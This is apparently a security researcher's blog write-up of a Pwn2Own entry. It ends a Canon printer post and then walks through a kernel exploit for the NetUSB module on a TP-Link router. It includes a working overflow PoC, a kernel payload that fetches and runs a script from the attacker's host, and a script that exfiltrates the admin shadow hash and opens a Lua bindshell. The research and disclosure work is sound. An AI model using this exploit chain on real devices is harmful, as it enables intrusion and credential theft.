A quick look at this new version shows that the /privet endpoint is no longer reachable: the function registering this path now logs a message before simply exiting, and the /privet string no longer appears in the binary. Despite this, it seems like the vulnerable code itself is still there - though it is now supposedly unreachable. Strings related to FTP have also been removed, hinting that Canon may have disabled this feature as well.

As a side note, disabling this feature makes sense since Google Cloud Print was discontinued on December 31, 2020, and Canon announced they no longer supported it as of January 1, 2021.

# Conclusion

In the end, we achieved a perfectly reliable exploit for our printer. It should be noted that all of our work was based on the European version of the printer, while the American version was used during the contest, so a bit of uncertainty remained on D-day. Fortunately, we had checked beforehand that the firmware of both versions matched.

We also adapted the offsets in our exploit to handle versions 9.01, 10.02, and 10.03 (released during the competition) in case the organizers' printer was updated. To do so, we built a script to automatically find the required offsets in the firmware and update our exploit.
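The general idea of such a script can be sketched as follows: search each firmware image for a unique byte signature of the target function and derive its address from the load base. Everything here (names, load base, signature handling) is hypothetical:

```python
import re

LOAD_BASE = 0x40000000  # hypothetical load address of the firmware image

def find_offset(firmware, signature):
    """Return the absolute address of a unique byte signature."""
    matches = [m.start() for m in re.finditer(re.escape(signature), firmware)]
    if len(matches) != 1:
        raise ValueError("signature not unique: %d matches" % len(matches))
    return LOAD_BASE + matches[0]
```

Running this against each decrypted firmware version yields the per-version addresses to patch into the exploit.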

All in all, we were able to remotely display an image of our choosing on the printer's LCD screen, which counted as a success and earned us 2 Master of Pwn points.

# Competing in Pwn2Own 2021 Austin: Icarus at the Zenith

26 March 2022 at 15:00

# Introduction

In 2021, I finally spent some time looking at a consumer router I had been using for years. It started as a weekend project to look at something a bit different from what I was used to. On top of that, it was also a good occasion to play with new tools, learn new things.

I downloaded Ghidra, grabbed a firmware update and started to reverse-engineer various MIPS binaries that were running on my NETGEAR DGND3700v2 device. I quickly became pretty horrified with what I found and wrote Longue vue 🔭 over the weekend, which was a lot of fun (maybe a story for next time?). The security was such a joke that I threw the router away the next day and ordered a new one. I just couldn't believe this had been sitting in my network for several years. Ugh 😞.

Anyways, I eventually received a brand new TP-Link router and started to look into that as well. I was pleased to see that code quality was much better and I was slowly grinding through the code after work. Eventually, in May 2021, the Pwn2Own 2021 Austin contest was announced where routers, printers and phones were available targets. Exciting. Participating in that kind of competition has always been on my TODO list and I convinced myself for the longest time that I didn't have what it takes to participate 😅.

This time was different though. I decided I would commit and invest the time to focus on a target and see what happens. It couldn't hurt. On top of that, a few friends of mine were also interested and motivated to break some code, so that's what we did. In this blogpost, I'll walk you through the journey to prepare and enter the competition with the mofoffensive team.

# Target selections

At this point, @pwning_me, @chillbro4201 and I are motivated and chatting hard on discord. The end goal for us is to participate in the contest, and after taking a look at the contest's rules, the path of least resistance seems to be targeting a router. We had a bit more experience with them, and the hardware was easy and cheap to get, so it felt like the right choice.

At least, that's what we thought was the path of least resistance. After attending the contest, maybe printers were at least as soft but with a higher payout. But whatever, we weren't in it for the money so we focused on the router category and stuck with it.

Out of the 5 candidates, we decided to focus on the consumer devices because we assumed they would be softer. On top of that, I had a little bit of experience looking at TP-Link, and somebody in the group was familiar with NETGEAR routers. So those were the two targets we chose, and off we went: logged on Amazon and ordered the hardware to get started. That was exciting.

The TP-Link AC1750 Smart Wi-Fi router arrived at my place and I started to get going. But where to start? Well, the best thing to do in those situations is to get a root shell on the device. It doesn't really matter how you get it; you just want one to be able to figure out what the interesting attack surfaces to look at are.

As mentioned in the introduction, while playing with my own TP-Link router in the months prior to this I had found a post auth vulnerability that allowed me to execute shell commands. Although this was useless from an attacker perspective, it would be useful to get a shell on the device and bootstrap the research. Unfortunately, the target wasn't vulnerable and so I needed to find another way.

Oh also. Fun fact: I actually initially ordered the wrong router. It turns out TP-Link sells two lines of products that look very similar: the A7 and the C7. I bought the former but needed the latter for the contest, yikers 🤦🏽‍♂️. Special thanks to Cody for letting me know 😅!

# Getting a shell on the target

After reverse-engineering the web server for a few days, looking for low hanging fruits and not finding any, I realized that I needed to find another way to get a shell on the device.

After googling a bit, I found an article written by my countrymen: Pwn2own Tokyo 2020: Defeating the TP-Link AC1750 by @0xMitsurugi and @swapg. The article described how they compromised the router at Pwn2Own Tokyo in 2020 but it also described how they got a shell on the device, great 🙏🏽. The issue is that I really have no hardware experience whatsoever. None.

But fortunately, I have pretty cool friends. I pinged my boy @bsmtiam, he recommended ordering an FT232 USB cable, and so I did. I received the hardware shortly after and swung by his place. He took apart the router, put it on a bench and got to work.

After a few tries, he successfully soldered the UART. We hooked up the FT232 USB Cable to the router board and plugged it into my laptop:

Using Python and the minicom library, we were finally able to drop into an interactive root shell 💥:

Amazing. To celebrate this small victory, we went off to grab a burger and a beer 🍻 at the local pub. Good day, this day.

# Enumerating the attack surfaces

It was time for me to figure out which areas I should focus my time on. I did a bunch of reading, as this router has been targeted multiple times over the years at Pwn2Own. I figured it might be good to try to break new ground, both to lower the chance of entering the competition with a duplicate and to maximize my chances of finding something that would let me enter the competition at all. But before thinking about duplicates, I needed a bug.

I started to do some very basic attack surface enumeration: processes running, iptable rules, sockets listening, crontable, etc. Nothing fancy.

# ./busybox-mips netstat -platue
Active Internet connections (servers and established)
tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 localhost:20002         0.0.0.0:*               LISTEN      4877/tmpServer
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:*               LISTEN      4377/dnsmasq
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      5075/dropbear
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 :::domain               :::*                    LISTEN      4377/dnsmasq
tcp        0      0 :::ssh                  :::*                    LISTEN      5075/dropbear
udp        0      0 0.0.0.0:20002           0.0.0.0:*                           4878/tdpServer
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:54480           0.0.0.0:*                           -
udp        0      0 0.0.0.0:42998           0.0.0.0:*                           5883/conn-indicator
udp        0      0 :::domain               :::*                                4377/dnsmasq


At first sight, the following processes looked interesting:

• the uhttpd HTTP server,
• the third-party dnsmasq service, which could potentially be unpatched against upstream bugs (unlikely?),
• the tdpServer, which was popped back in 2021 and was a vector for a vuln exploited in sync-server.

# Chasing ghosts

Because I was familiar with how the uhttpd HTTP server worked on my home router, I figured I would at least spend a few days looking at the one running on the target router. The HTTP server is able to run and invoke Lua extensions, and that's where I figured bugs could be: command injections, etc. But interestingly enough, all the existing public Lua tooling failed to analyze those extensions, which was both frustrating and puzzling. Long story short, it seems the Lua runtime used on the router has been modified such that the opcode table is shuffled. As a result, the compiled extensions break all the public tools because the opcodes don't match. Silly. I eventually managed to decompile some of those extensions and found one bug, but it was probably useless from an attacker perspective. It was time to move on, as I didn't feel there was enough potential for me to find something interesting there.

Another thing I burned time on was going through the GPL code archive that TP-Link published for this router: ArcherC7V5.tar.bz2. Because of licensing, TP-Link has to (?) 'maintain' an archive containing the GPL code they are using on the device. I figured it could be a good way to tell whether dnsmasq was properly patched against the vulnerabilities published in the past years. It looked like some of them weren't patched, but the disassembly showed otherwise 😔. Dead-end.

# NetUSB shenanigans

There were two strange lines in the netstat output from above that stood out to me:

tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -


Why is there no process name associated with those sockets uh 🤔? Well, it turns out that after googling and looking around, those sockets are opened by a... wait for it... kernel module. It sounded pretty crazy to me and it was also the first time I had seen this. Kinda exciting though.

This NetUSB.ko kernel module is actually a piece of software written by the KCodes company to do USB over IP. The other wild thing is that I remembered seeing this same module on my NETGEAR router. Weird. After googling around, it was also no surprise to see that multiple vulnerabilities had been discovered and exploited in it in the past, and that TP-Link was indeed not the only vendor shipping this module.

Although I didn't think it would be likely for me to find something interesting in there, I still invested time to look into it and get a feel for it. After a few days reverse-engineering this statically, it definitely looked much more complex than I initially thought and so I decided to stick with it for a bit longer.

After grinding through it for a while, things started to make sense: I had reverse-engineered some important structures and was able to follow the untrusted inputs deeper into the code. After enumerating a lot of places where the attacker input is parsed and used, I found one spot where I could overflow an integer in arithmetic fed to an allocation function:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
    // ...
    result = (void *)SoftwareBus_fillBuf(SbusConnection, v64, 4);
    if (result) {
        v64[0] = _bswapw(v64[0]);                     // <-- attacker controlled
        Payload_1 = mallocPageBuf(v64[0] + 9, 0xD0);  // <-- overflow
        // ...


I first thought this was going to lead to a wild overflow type of bug, because the code would try to read a very large number of bytes into this buffer, but I still went ahead and crafted a PoC. That's when I realized that I was wrong. Looking carefully, the SoftwareBus_fillBuf function is actually defined as follows:

int SoftwareBus_fillBuf(SbusConnection_t *SbusConnection, void *Buffer, int BufferLen) {
    if (SbusConnection) {
        if (Buffer) {
            if (BufferLen) {
                while (1) {
                    GetLen = KTCP_get(SbusConnection, SbusConnection->ClientSocket, Buffer, BufferLen);
                    if (GetLen <= 0)
                        break;
                    BufferLen -= GetLen;
                    Buffer = (char *)Buffer + GetLen;
                    if (!BufferLen)
                        return 1;
                }
                kc_printf("INFO%04X: _fillBuf(): len = %d\n", 1275, GetLen);
                return 0;
            } else {
                return 1;
            }
        } else {
            // ...
            return 0;
        }
    } else {
        // ...
        return 0;
    }
}


KTCP_get is basically a wrapper around ks_recv, which means an attacker can force the function to return without reading the whole BufferLen amount of bytes. This meant that I could force the allocation of a small buffer and overflow it with as much data as I wanted. If you are interested in learning how to trigger this code path in the first place, please check how the handshake works in zenith-poc.py, or you can also read CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers from @maxpl0it. The below code can trigger the above vulnerability:

from Crypto.Cipher import AES
import socket
import struct
import argparse

le8 = lambda i: struct.pack('=B', i)
le32 = lambda i: struct.pack('<I', i)

netusb_port = 20005

def send_handshake(s, aes_ctx):
    # Version
    s.send(b'\x56\x04')
    # Send random data
    s.send(aes_ctx.encrypt(b'a' * 16))
    _ = s.recv(16)
    # Receive & send back the random numbers.
    challenge = s.recv(16)
    s.send(aes_ctx.encrypt(challenge))

def send_bus_name(s, name):
    length = len(name)
    assert length - 1 < 63
    s.send(le32(length))
    b = name
    if type(name) == str:
        b = bytes(name, 'ascii')
    s.send(b)

def create_connection(target, port, name):
    second_aes_k = bytes.fromhex('5c130b59d26242649ed488382d5eaecc')
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, port))
    aes_ctx = AES.new(second_aes_k, AES.MODE_ECB)
    send_handshake(s, aes_ctx)
    send_bus_name(s, name)
    return s, aes_ctx

def main():
    parser = argparse.ArgumentParser('Zenith PoC2')
    parser.add_argument('target')
    args = parser.parse_args()
    s, _ = create_connection(args.target, netusb_port, 'PoC2')
    s.send(le8(0xff))
    s.send(le8(0x21))
    s.send(le32(0xff_ff_ff_ff))
    p = b'\xab' * (0x1_000 * 100)
    s.send(p)

Another interesting detail was that the allocation function is mallocPageBuf, which I didn't know about. Looking into its implementation, it eventually calls into __get_free_pages, which is part of the Linux kernel. __get_free_pages allocates 2**n pages and is implemented using what is called a binary buddy allocator. I wasn't familiar with that kind of allocator and ended up kind of fascinated by it. You can read about it in Chapter 6: Physical Page Allocation if you want to know more.

Wow ok, so maybe I could do something useful with this bug. Still a long shot, but based on my understanding the bug gave me full control over the content, and I was able to overflow the pages with pretty much as much data as I wanted. The one thing I couldn't fully control was the size passed to the allocation: because of the integer overflow, I could only trigger a mallocPageBuf call with a size in the interval [0, 8]. mallocPageBuf aligns the passed size to the next power of two and calculates the order (the n in 2**n) to invoke __get_free_pages.
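As a back-of-the-envelope check (my own sketch, not the driver's actual code), here is the arithmetic at play: on a 32-bit kernel the attacker-controlled size wraps around when 9 is added, and rounding the tiny wrapped result up to a power-of-two number of pages always yields order 0, i.e. a single page.

```python
PAGE_SIZE = 0x1000

# Sketch of the size-to-order logic (assumption: mallocPageBuf rounds the
# request up to the next power-of-two number of pages for __get_free_pages).
def order_for_size(size: int) -> int:
    pages = max(1, (size + PAGE_SIZE - 1) // PAGE_SIZE)  # pages needed
    order = 0
    while (1 << order) < pages:
        order += 1
    return order

# The 32-bit integer overflow: 0xffffffff + 9 wraps to 8...
wrapped = (0xffff_ffff + 9) & 0xffff_ffff
assert wrapped == 8
# ...so the driver allocates a single page (order 0) and then tries to
# read a huge amount of attacker data into it.
assert order_for_size(wrapped) == 0
```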

Another good thing going for me was that the kernel didn't have KASLR, and I also noticed that the kernel did its best to keep running even when encountering access violations or whatnot. It wouldn't crash and reboot at the first hiccup on the road but would instead keep going until it couldn't anymore. Sweet.

I also eventually discovered that the driver was leaking kernel addresses over the network. In the above snippet, kc_printf is invoked with diagnostic / debug strings. Looking at its code, I realized the strings are actually sent over the network on a different port. I figured this could be helpful both for synchronization and for leaking some allocations made by the driver.

int kc_printf(const char *a1, ...) {
    // ...
    v1 = vsprintf(v6, a1);
    v2 = v1 < 257;
    v3 = v1 + 1;
    if (!v2) {
        v6[256] = 0;
        v3 = 257;
    }
    v5 = v3;
    kc_dbgD_send(&v5, v3 + 4); // <-- send over socket
    return printk("<1>%s", v6);
}


Pretty funny right?
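To give an idea of what consuming that leak can look like, here is a hedged sketch of a client for kc_dbgD_send's framing. The 4-byte length prefix matches the decompiled snippet above (it sends v3 + 4 bytes starting at the length word), but the byte order and the exact debug port are my assumptions; the exploit's Leaker class is the real consumer.

```python
import socket
import struct

# Hedged sketch: parse the length-prefixed debug strings that
# kc_dbgD_send() appears to emit (4-byte length, then the message).
# Endianness (big-endian MIPS here) is an assumption.
def recv_exact(s: socket.socket, n: int) -> bytes:
    buf = b''
    while len(buf) < n:
        chunk = s.recv(n - len(buf))
        if not chunk:
            raise EOFError('connection closed')
        buf += chunk
    return buf

def read_debug_msg(s: socket.socket) -> bytes:
    (length,) = struct.unpack('>I', recv_exact(s, 4))
    return recv_exact(s, length)

# Quick self-test over a socketpair instead of the router's debug port.
a, b = socket.socketpair()
msg = b'INFO04FB: _fillBuf(): len = -1\n\x00'
a.send(struct.pack('>I', len(msg)) + msg)
assert read_debug_msg(b) == msg
```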

# Booting NetUSB in QEMU

Although I had a root shell on the device, I wasn't able to debug the kernel or the driver's code. This made it very hard to even think about exploiting this vulnerability. On top of that, I am a complete Linux noob, so this lack of introspection wasn't going to work. What were my options?

Well, as I mentioned earlier, TP-Link maintains a GPL archive which has information on the Linux version they use, the patches they apply and supposedly everything necessary to build a kernel. I thought that was extremely nice of them and that it should give me a good starting point to be able to debug this driver under QEMU. I knew this wouldn't give me the most precise simulation environment but, at the same time, it would be a vast improvement over my current situation. I would be able to hook up GDB, inspect the allocator state, and hopefully make progress.

Turns out this was much harder than I thought. I started by trying to build the kernel via the GPL archive. In appearance, everything is there and a simple make should just work. But that didn't cut it. It took me weeks to actually get it to compile (right dependencies, patching bits here and there, ...), but I eventually did it. I had to try a bunch of toolchain versions, fix random files that would lead to errors on my Linux distribution, etc. To be honest I mostly forgot all the details here but I remember it being painful. If you are interested, I have zipped up the filesystem of this VM and you can find it here: wheezy-openwrt-ath.tar.xz.

I thought this was the end of my suffering, but it was in fact not. At all. The built kernel wouldn't boot in QEMU and would hang at boot time. I tried to understand what was going on, but it looked related to the emulated hardware and I was honestly out of my depth. So I decided to look at the problem from a different angle. Instead, I downloaded a Linux MIPS QEMU image from aurel32's website that booted just fine, and decided that I would try to merge both kernel configurations until I ended up with a bootable image whose configuration was as close as possible to the kernel running on the device. Same kernel version, same allocators, same drivers, etc. At least similar enough to be able to load the NetUSB.ko driver.

Again, because I am a complete Linux noob, I failed to really see the complexity there. So I got started on this journey where I must have compiled easily 100+ kernels until being able to load and execute the NetUSB.ko driver in QEMU. The main challenge that I had failed to see is that in Linux land, configuration flags can change the size of internal structures. This means that if you are trying to run a driver A on kernel B, the driver A might mistake a structure to be of size C when it is in fact of size D. That's exactly what happened. Starting the driver in this QEMU image led to a ton of random crashes that I couldn't really explain at first. So I followed multiple rabbit holes until realizing that my kernel configuration was just not in agreement with what the driver expected. For example, the net_device structure defined below shows that its definition varies depending on kernel configuration options being on or off: CONFIG_WIRELESS_EXT, CONFIG_VLAN_8021Q, CONFIG_NET_DSA, CONFIG_SYSFS, CONFIG_RPS, CONFIG_RFS_ACCEL, etc. But that's not all. Any type used by this structure can do the same, which means that looking at the main definition of a structure is not enough.

struct net_device {
    // ...
#ifdef CONFIG_WIRELESS_EXT
    /* List of functions to handle Wireless Extensions (instead of ioctl).
     * See <net/iw_handler.h> for details. Jean II */
    const struct iw_handler_def *wireless_handlers;
    /* Instance data managed by the core of Wireless Extensions. */
    struct iw_public_data       *wireless_data;
#endif
    // ...
#if IS_ENABLED(CONFIG_VLAN_8021Q)
    struct vlan_info __rcu      *vlan_info;   /* VLAN info */
#endif
#if IS_ENABLED(CONFIG_NET_DSA)
    struct dsa_switch_tree      *dsa_ptr;     /* dsa specific data */
#endif
    // ...
#ifdef CONFIG_SYSFS
    struct kset                 *queues_kset;
#endif

#ifdef CONFIG_RPS
    struct netdev_rx_queue      *_rx;

    /* Number of RX queues allocated at register_netdev() time */
    unsigned int                num_rx_queues;

    /* Number of RX queues currently active in device */
    unsigned int                real_num_rx_queues;

#ifdef CONFIG_RFS_ACCEL
    /* CPU reverse-mapping for RX completion interrupts, indexed
     * by RX queue number.  Assigned by driver.  This must only be
     * set if the ndo_rx_flow_steer operation is defined. */
    struct cpu_rmap             *rx_cpu_rmap;
#endif
#endif
    // ...
};


Once I figured that out, I went through a pretty lengthy process of trial and error. I would start the driver, get information about the crash, and look at the code / structures involved to see if a kernel configuration option impacted the layout of a relevant structure. From there, I could diff the kernel configuration of my bootable QEMU image against the kernel I had built from the GPL and see where the mismatches were. If there was one, I could simply turn the option on or off, recompile and hope that it didn't make the kernel unbootable under QEMU.

After at least 136 compilations (the number of times I found make ARCH=mips in one of my .bash_history 😅) and an enormous amount of frustration, I eventually built a Linux kernel version able to run NetUSB.ko 😲:

$ qemu-system-mips -m 128M -nographic -append "root=/dev/sda1 mem=128M" \
    -kernel linux338.vmlinux.elf -M malta -cpu 74Kf -s \
    -hda debian_wheezy_mips_standard.qcow2 \
    -net nic,netdev=network0 \
    -netdev user,id=network0,hostfwd=tcp:127.0.0.1:20005-10.0.2.15:20005,hostfwd=tcp:127.0.0.1:33344-10.0.2.15:33344,hostfwd=tcp:127.0.0.1:31337-10.0.2.15:31337 [...]

# ./start.sh
[   89.092000] new slab @ 86964000
[   89.108000] kcg 333 :GPL NetUSB up!
[   89.240000] NetUSB: module license 'Proprietary' taints kernel.
[   89.240000] Disabling lock debugging due to kernel taint
[   89.268000] kc 90 : run_telnetDBGDServer start
[   89.272000] kc 227 : init_DebugD end
[   89.272000] INFO17F8: NetUSB 1.02.69, 00030308 : Jun 11 2015 18:15:00
[   89.272000] INFO17FA: 7437: Archer C7 :Archer C7
[   89.272000] INFO17FB: AUTH ISOC
[   89.272000] INFO17FC: filterAudio
[   89.272000] usbcore: registered new interface driver KC NetUSB General Driver
[   89.276000] INFO0145: init proc : PAGE_SIZE 4096
[   89.280000] INFO16EC: infomap 869c6e38
[   89.280000] INFO16EF: sleep to wait eth0 to wake up
[   89.280000] INFO15BF: tcpConnector() started... : eth0
NetUSB 160207 0 - Live 0x869c0000 (P)
GPL_NetUSB 3409 1 NetUSB, Live 0x8694f000
[   92.308000] INFO1572: Bind to eth0


For the readers that would like to do the same, here are some technical details that they might find useful (I probably forgot most of the other ones):

• I used debootstrap to easily install older Linux distributions until one worked fine with package dependencies, older libc, etc. I used a Debian Wheezy (7.11) distribution to build the GPL code from TP-Link as well as to cross-compile the kernel. I uploaded archives of those two systems: wheezy-openwrt-ath.tar.xz and wheezy-compile-kernel.tar.xz. You should be able to extract those on a regular Ubuntu Intel x64 VM, chroot into those folders, and reproduce what I described, or at least come very close to reproducing it.
• I cross-compiled the kernel using the following toolchain: toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2 (gcc (Linaro GCC 4.6-2012.02) 4.6.3 20120201 (prerelease)). I used the following command to compile the kernel: $ make ARCH=mips CROSS_COMPILE=/home/toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2/bin/mips-openwrt-linux- -j8 vmlinux. You can find the toolchain in wheezy-openwrt-ath.tar.xz, which is downloaded / compiled from the GPL code, or you can grab the binaries directly off wheezy-compile-kernel.tar.xz.
• You can find the command line I used to start QEMU in start_qemu.sh and dbg.sh to attach GDB to the kernel.

# Enters Zenith

Once I was able to attach GDB to the kernel I finally had an environment where I could get as much introspection as I needed. Note that because of all the modifications I had done to the kernel config, I didn't really know if it would be possible to port the exploit to the real target. But I also didn't have an exploit at the time, so I figured this would be another problem to solve later if I even get there.

I started to read a lot of code, documentation and papers about Linux kernel exploitation. The Linux kernel version was old enough that it didn't have a bunch of the more recent mitigations. This gave me some hope. I spent quite a bit of time trying to exploit the overflow from above. In Exploiting the Linux kernel via packet sockets, Andrey Konovalov describes in detail an attack that looked like it could work for the bug I had found. Also, read the article as it is both well written and fascinating. The overall idea is that kmalloc internally uses the buddy allocator to get pages off the kernel, and as a result, we might be able to place the buddy page that we can overflow right before pages used to store a kmalloc slab. If I remember correctly, my strategy was to drain the order 0 freelist (blocks of memory that are 0x1000 bytes) which would force blocks from the higher orders to be broken down to feed the freelist. I imagined that a block from the order 1 freelist could be broken into 2 chunks of 0x1000, which would mean I could get a 0x1000 block adjacent to another 0x1000 block that could now be used by a kmalloc-1024 slab. I struggled and tried a lot of things and never managed to pull it off. I remember the bug had a few annoying quirks I hadn't noticed when finding it, but I am sure a more experienced Linux kernel hacker could have written an exploit for it.
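My mental model of that shaping primitive can be illustrated with a toy buddy allocator (an illustration of the splitting behavior only, not the kernel's implementation): once the order-0 freelist is drained, the next order-0 allocation splits an order-1 block into two physically adjacent pages, which is exactly the adjacency the attack relies on.

```python
PAGE = 0x1000

# Toy buddy model: freelists maps order -> list of free block addresses.
def alloc_order0(freelists: dict) -> int:
    if freelists[0]:
        return freelists[0].pop(0)
    # Order-0 list is empty: split an order-1 block into two buddies.
    base = freelists[1].pop(0)
    freelists[0].append(base + PAGE)  # second half goes back on order 0
    return base

freelists = {0: [], 1: [0x8696_0000]}
a = alloc_order0(freelists)  # splits the order-1 block
b = alloc_order0(freelists)  # returns its buddy
assert b == a + PAGE  # the two pages are physically adjacent
```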

I thought, oh well. Maybe there's something better. Maybe I should focus on looking for a similar bug but in a kmalloc'd region as I wouldn't have to deal with the same problems as above. I would still need to worry about being able to place the buffer adjacent to a juicy corruption target though. After looking around for a bit longer I found another integer overflow:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
    // ...
    case 0x50:
        AllocatedBuffer = _kmalloc(ReceivedSize + 17, 208);
        if (!AllocatedBuffer) {
            return kc_printf("INFO%04X: Out of memory in USBSoftwareBus", 4296);
        }
        // ...
        if (!SoftwareBus_fillBuf(SbusConnection, AllocatedBuffer + 16, ReceivedSize))

Cool. But at this point, I was a bit out of my depth. I was able to overflow kmalloc-128 but didn't really know what kind of useful object I could place there from over the network. After a bunch of trial and error, I started to notice that if I took a small pause after the allocation of the buffer but before overflowing it, an interesting structure would magically be allocated fairly close to my buffer. To this day, I haven't fully debugged where it exactly came from, but as this was my only lead, I went along with it.

The target kernel has neither ASLR nor NX, so my exploit is able to hardcode addresses and execute code from the heap directly, which was nice. I can also place arbitrary data in the heap using the various allocation functions I had reverse-engineered earlier. For example, triggering a 3MB allocation always returned a fixed address where I could stage content. To get this address, I simply patched the driver binary to print the address on the real device after the allocation, as I couldn't debug it.

# (gdb) x/10dwx 0xffffffff8522a000
# 0x8522a000:     0xff510000      0x1000ffff      0xffff4433      0x22110000
# 0x8522a010:     0x0000000d      0x0000000d      0x0000000d      0x0000000d
# 0x8522a020:     0x0000000d      0x0000000d

# ...

def main(stdscr):
    # ...
    _3mb = 3 * 1_024 * 1_024
    leaker.wait_for_one()
    y += 1

My final exploit, Zenith, overflows the head.next pointer of an adjacent wait_queue_head_t that is placed by the socket stack of the Linux kernel, replacing it with the address of a crafted wait_queue_entry_t under my control (the Trasher class in the exploit code). These are the definitions of the structures:

struct wait_queue_head {
    spinlock_t          lock;
    struct list_head    task_list;
};

struct wait_queue_entry {
    unsigned int        flags;
    void                *private;
    wait_queue_func_t   func;
    struct list_head    task_list;
};
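For illustration, the corrupted pointer has to point at memory laid out like one of those entries. Here is a hedged sketch of packing a fake entry for a 32-bit big-endian MIPS target (field order per the struct above; the flags/private values are arbitrary placeholders, and 0x83c00000 is the staged-payload address mentioned below):

```python
import struct

# Hedged sketch: pack a fake wait_queue_entry (flags, private, func) as
# three big-endian 32-bit words. 0x83c00000 stands in for the staged
# kernel payload address; flags/private are arbitrary here.
def fake_wait_queue_entry(func_addr: int, flags: int = 0, private: int = 0) -> bytes:
    return struct.pack('>III', flags, private, func_addr)

entry = fake_wait_queue_entry(0x83c0_0000)
assert len(entry) == 12
assert entry[8:12] == b'\x83\xc0\x00\x00'  # func pointer lands last
```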


This structure has a function pointer, func, that I use to hijack the execution and redirect the flow to a fixed location, in a large kernel heap chunk where I previously staged the payload (0x83c00000 in the exploit code). The function invoking the func function pointer is __wake_up_common and you can see its code below:

static void __wake_up_common(wait_queue_head_t *q, unsigned int mode,
            int nr_exclusive, int wake_flags, void *key)
{
    wait_queue_t *curr, *next;

    list_for_each_entry_safe(curr, next, &q->task_list, task_list) {
        unsigned flags = curr->flags;

        if (curr->func(curr, mode, wake_flags, key) &&
                (flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
            break;
    }
}


This is what it looks like in GDB once q->head.next/prev has been corrupted:

(gdb) break *__wake_up_common+0x30 if ($v0 & 0xffffff00) == 0xdeadbe00
(gdb) break sock_recvmsg if msg->msg_iov[0].iov_len == 0xffffffff
(gdb) c
Continuing.
sock_recvmsg(dst=0xffffffff85173390)

Breakpoint 2, __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1,
    key=0xc1) at kernel/sched/core.c:3375
3375    kernel/sched/core.c: No such file or directory.
(gdb) p *q
$1 = {lock = {{rlock = {raw_lock = {<No data fields>}}}}, task_list = {next = 0xdeadbee1,

(gdb) bt
#0  __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
at kernel/sched/core.c:3375
#1  0x80141ea8 in __wake_up_sync_key (q=<optimized out>, mode=<optimized out>,
nr_exclusive=<optimized out>, key=<optimized out>) at kernel/sched/core.c:3450
#2  0x8045d2d4 in tcp_prequeue (skb=0x87eb4e40, sk=0x851e5f80) at include/net/tcp.h:964
#3  tcp_v4_rcv (skb=0x87eb4e40) at net/ipv4/tcp_ipv4.c:1736
#4  0x8043ae14 in ip_local_deliver_finish (skb=0x87eb4e40) at net/ipv4/ip_input.c:226
#5  0x8040d640 in __netif_receive_skb (skb=0x87eb4e40) at net/core/dev.c:3341
#6  0x803c50c8 in pcnet32_rx_entry (entry=<optimized out>, rxp=0xa0c04060, lp=0x87d08c00,
dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1199
#7  pcnet32_rx (budget=16, dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1212
#8  pcnet32_poll (napi=0x87d08c5c, budget=16) at drivers/net/ethernet/amd/pcnet32.c:1324
#9  0x8040dab0 in net_rx_action (h=<optimized out>) at net/core/dev.c:3944
#10 0x801244ec in __do_softirq () at kernel/softirq.c:244
#11 0x80124708 in do_softirq () at kernel/softirq.c:293
#12 do_softirq () at kernel/softirq.c:280
#13 0x80124948 in invoke_softirq () at kernel/softirq.c:337
#14 irq_exit () at kernel/softirq.c:356
#15 0x8010198c in ret_from_exception () at arch/mips/kernel/entry.S:34


Once the func pointer is invoked, I get control over the execution flow and I execute a simple kernel payload that leverages call_usermodehelper_setup / call_usermodehelper_exec to execute user mode commands as root. It pulls a shell script off a listening HTTP server on the attacker machine and executes it.

arg0: .asciiz "/bin/sh"
arg1: .asciiz "-c"
arg2: .asciiz "wget http://{ip_local}:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh"
argv: .word arg0
      .word arg1
      .word arg2
envp: .word 0


The pwn.sh shell script simply leaks the admin's shadow hash, and opens a bindshell (cheers to Thomas Chauchefoin and Kevin Denis for the Lua oneliner) the attacker can connect to (if the kernel hasn't crashed yet 😳):

#!/bin/sh
export LPORT=31337
wget http://{ip_local}:8000/pwd?$(grep -E admin: /etc/shadow)
lua -e 'local k=require("socket"); local s=assert(k.bind("*",os.getenv("LPORT"))); local c=s:accept(); while true do local r,x=c:receive();local f=assert(io.popen(r,"r")); local b=assert(f:read("*a"));c:send(b); end;c:close();f:close();'


The exploit also uses the debug interface that I mentioned earlier, as it leaks kernel-mode pointers and is overall useful for basic synchronization (cf the Leaker class).

OK, at that point it worked in QEMU... which is pretty wild. I never thought it would. Ever. What's also wild is that I was still in time for the Pwn2Own registration, so maybe this was possible after all 🤔. Reliability wise, it worked well enough in the QEMU environment: about 3 times out of 5, I would say. Good enough. I started to port the exploit over to the real device and, to my surprise, it worked there as well. The reliability was poorer, but I was impressed that it still worked. Crazy. Especially with both the hardware and the kernel being different! As I still wasn't able to debug the target's kernel, I was left with dmesg output to try to make things better: tweak the spray here and there, try to go faster or slower, trying to find a magic combination. In the end, I didn't find anything magic; the exploit was unreliable, but hey, I only needed it to land once on stage 😅. This is what it looks like when the stars align 💥:

Beautiful. Time to register!

# Entering the contest

